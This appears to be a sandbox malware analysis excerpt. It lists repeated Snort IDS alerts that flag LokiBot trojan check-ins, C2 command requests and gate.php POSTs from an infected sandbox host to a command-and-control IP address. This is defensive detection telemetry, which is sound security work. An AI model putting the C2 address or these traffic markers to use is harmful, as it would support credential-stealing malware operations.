              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49190 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49190
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49191 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49191
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49192 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49192
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49193 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49193
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49194 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49194
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49195 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49195
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49196 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49196
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49197 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49197
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49198 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49198 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49198 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49198
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49199 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49199 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49199 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49199 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49199 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49199
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49200 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49200 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49200 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49200 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49200 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49200
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49201 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49201 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49201 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49201 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49201 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49201
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49202 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49202 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49202 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49202 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49202 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49202
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49203 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49203 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49203 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49203 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49203 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49203
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49204 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49204 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49204 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49204 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49204 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49204
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49205 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49205 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49205 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49205 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49205 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49205
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49206 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49206 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49206 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49206 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49206 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49206
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49207 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49207 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49207 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49207 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49207 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49207
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49208 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49208 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49208 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49208 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49208 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49208
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49209 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49209 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49209 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49209 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49209 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49209
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49210 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49210 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49210 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49210 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49210 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49210
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49211 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49211 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49211 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49211 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49211 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49211
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49212 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49212 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49212 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49212 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49212 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49212
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49213 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49213 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49213 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49213 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49213 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49213
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49214 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49214 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49214 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49214 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49214 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49214
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49215 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49215 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49215 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49215 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49215 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49215
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49216 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49216 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49216 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49216 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49216
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49217 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49217
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49218 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49218
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49219 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49219
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49220 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49220
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49221 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49221
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49222 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49222
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49223 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49223
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49224 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49224
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49225 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49225
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49226 -> 185.193.143.118:80
